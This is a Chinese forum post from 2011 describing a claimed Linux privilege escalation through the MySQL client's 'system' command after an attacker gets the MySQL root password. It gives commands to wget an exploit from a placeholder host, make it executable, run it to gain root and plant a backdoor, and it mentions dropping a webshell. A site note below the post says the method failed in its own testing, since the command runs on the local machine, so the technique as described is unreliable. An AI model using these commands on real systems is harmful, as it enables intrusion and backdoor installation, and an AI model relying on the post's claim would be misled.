服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务

运维之家

 找回密码
 注册
搜索
查看: 4076|回复: 0

linux提权之mysql的root权限通过system函数提权

[复制链接]
dirtysea 发表于 2011-11-6 02:22:09 | 显示全部楼层 |阅读模式
linux提权,本文为您讲述一种linux提权方法,这是一种常见的linux提权技术..
linux系统环境下,mysql以root权限登录时提权

mysql5.x 的linux版本下面有一个函数,可以帮助我们干很多猥琐的事情,这个函数4。x下面貌似没有,原来一直没发现,也没去查函数手册,就我自己的经验来写点东西。4,x的 明天再看看函数手册,再装一个实验一下。

mysql 5.x里面引入了一个system函数,这个函数可以执行系统命令,当mysql以root登陆的时候,就可以利用这个函数执行命令,当然是在权限许可的 范围内。

一般我们按照常规思路,搞到mysql的root密码之后,我们都会连接上去,创建一个表,然后outfile,搞到一个webshell ,然后提权如斯这般。今天我们换一种方式。

按照上面的方法,我们需要知道web的绝对路径,当然这个很不好找,有些有sqlinjection的,可能报错会显示出来,有的就不一定了。但是 按照我的的方法,没有必要再去找web路径了,直接执行

mysql>system vi /etc/httpd/conf/httpd.conf;
直接这样就可以找到web的路径,当然,我们的目的并不是找web路径,放webshell进去。我们是要来做其他的事情,好比,下载exp执行, 搞到 root权限,然后装后门


mysql>system wget http://www.xxx.com/xxxx ;   
mysql>system chmod +x xxxx;   mysql>system ./xxxx;  
这样mysql的root此时就成为system的root了,剩下的事情,假如开了ssh,就ssh连接上去,输入mysql的用户密码,ok,搞 定。
~~~~~~~~~~~~~~~~~~~~~~~~~~`
此方法经本站测试是不管用的,执行命令是在本地执行,而非远程服务器. 比如 执行 system ls; 则列出本地服务器文件
此文章网上流传很多,只是转来给大家提供一种思路,也可能是我测试有问题。仁者见仁,智者见智。请大家把测试结果留言在下面,共同交流。
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|小黑屋|手机版|Archiver|运维之家 ( 蜀ICP备12020351号 )

GMT+8, 2018-10-23 05:45 , Processed in 0.064156 second(s), 15 queries .

Powered by Discuz! X3.4

© 2001-2017 Comsenz Inc.

快速回复 返回顶部 返回列表